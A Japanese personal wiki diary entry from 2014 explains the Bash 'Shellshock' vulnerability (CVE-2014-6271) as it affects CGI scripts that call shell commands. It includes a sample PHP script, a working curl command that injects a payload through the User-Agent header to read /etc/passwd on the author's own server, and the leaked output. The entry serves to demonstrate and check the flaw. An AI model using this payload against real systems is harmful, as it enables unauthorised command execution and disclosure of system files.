このページの翻訳:
- 日本語 (ja)
- English (en)
最近の更新
- 04 ↷ 50_dialy:2024:04:04 から 50_dialy:2024:04:05 へページを名称変更しました。
- 2024.04.02 Homebrewを入れる [各バージョン確認]
サイドバー
50_dialy:2014:09:25
2014.09.25 Bash脆弱性
https://support.clara.jp/news/20140925_bash_update.htm
http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html
https://access.redhat.com/security/cve/CVE-2014-6271
※CGI本体をシェルスクリプトで書いていなくても、シェルを使って外部コマンドを呼び出しているだけで影響有り
下記のスクリプトをCGIモードで動かしている場合、影響有りです。
<?php
echo 'AAAA';
exec('df -h',$array);
foreach($array as $v){
echo $v."\n";
}
?>
以下実行例
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://fl8.jp/test.php
AAAAContent-type:text/plain
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
・
・
・
・
50_dialy/2014/09/25.txt · 最終更新: 2017/11/08 10:18 by matsui
特に明示されていない限り、本Wikiの内容は次のライセンスに従います: CC Attribution-Noncommercial-Share Alike 4.0 International
